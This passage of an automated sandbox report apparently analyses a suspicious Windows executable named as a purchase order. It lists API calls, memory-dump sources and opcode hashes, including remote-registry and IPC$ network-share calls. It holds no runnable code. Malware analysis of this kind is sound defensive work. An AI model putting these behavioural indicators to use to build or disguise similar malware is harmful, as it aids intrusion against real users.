                                                            • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                            • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                            • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                            • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                            • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                            • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                            • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                            • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                            • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                            • DeleteObject.GDI32(?), ref: 0047151E
                                                            • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                            • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                            • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                            • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                            • DeleteObject.GDI32(?), ref: 004715EA
                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                            • String ID:
                                                            • API String ID: 3218148540-0
                                                            • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                            • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                            • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                            • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                            • String ID:
                                                            • API String ID: 136442275-0
                                                            • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                            • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                            • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                            • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                            APIs
                                                            • _wcsncpy.LIBCMT ref: 00467490
                                                            • _wcsncpy.LIBCMT ref: 004674BC
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • _wcstok.LIBCMT ref: 004674FF
                                                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                            • _wcstok.LIBCMT ref: 004675B2
                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                            • _wcslen.LIBCMT ref: 00467793
                                                            • _wcscpy.LIBCMT ref: 00467641
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • _wcslen.LIBCMT ref: 004677BD
                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                            • String ID: X
                                                            • API String ID: 3104067586-3081909835
                                                            • Opcode ID: e0c719383c523ef33ce473f5b235b96d5e8b705d2f751b88c5810ca8f90ea985
                                                            • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                            • Opcode Fuzzy Hash: e0c719383c523ef33ce473f5b235b96d5e8b705d2f751b88c5810ca8f90ea985
                                                            • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                            • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                            • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                            • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                            • _wcslen.LIBCMT ref: 0046CDB0
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                            • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                            • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                              • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                              • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                              • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 0046CEA6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 440038798-2785691316
                                                            • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                            • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                            • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                            • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                            • _wcslen.LIBCMT ref: 004610A3
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                            • GetWindowRect.USER32(?,?), ref: 00461248
                                                              • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                            • String ID: ThumbnailClass
                                                            • API String ID: 4136854206-1241985126
                                                            • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                            • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                            • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                            • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                            APIs
                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                            • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                            • GetClientRect.USER32(?,?), ref: 00471A1A
                                                            • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                            • DestroyIcon.USER32(?), ref: 00471AF4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                            • String ID: 2
                                                            • API String ID: 1331449709-450215437
                                                            • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                            • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                            • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                            • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                            • __swprintf.LIBCMT ref: 00460915
                                                            • __swprintf.LIBCMT ref: 0046092D
                                                            • _wprintf.LIBCMT ref: 004609E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                            • API String ID: 3054410614-2561132961
                                                            • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                            • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                            • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                            • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                            APIs
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                            • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                            • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                            • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                            • API String ID: 600699880-22481851
                                                            • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                            • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                            • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                            • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: DestroyWindow
                                                            • String ID: static
                                                            • API String ID: 3375834691-2160076837
                                                            • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                            • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                            • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                            • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                            • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                            • API String ID: 2907320926-3566645568
                                                            • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                            • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                            • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                            • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                            APIs
                                                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                            • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                            • DeleteObject.GDI32(00530000), ref: 00470A04
                                                            • DestroyIcon.USER32(00530045), ref: 00470A1C
                                                            • DeleteObject.GDI32(1DAA3C26), ref: 00470A34
                                                            • DestroyWindow.USER32(00740069), ref: 00470A4C
                                                            • DestroyIcon.USER32(?), ref: 00470A73
                                                            • DestroyIcon.USER32(?), ref: 00470A81
                                                            • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 1237572874-0
                                                            • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                            • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                            • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                            • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                            • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                            • VariantInit.OLEAUT32(?), ref: 004793E1
                                                            • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                            • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                            • VariantClear.OLEAUT32(?), ref: 00479489
                                                            • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                            • VariantClear.OLEAUT32(?), ref: 004794CA
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                            • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
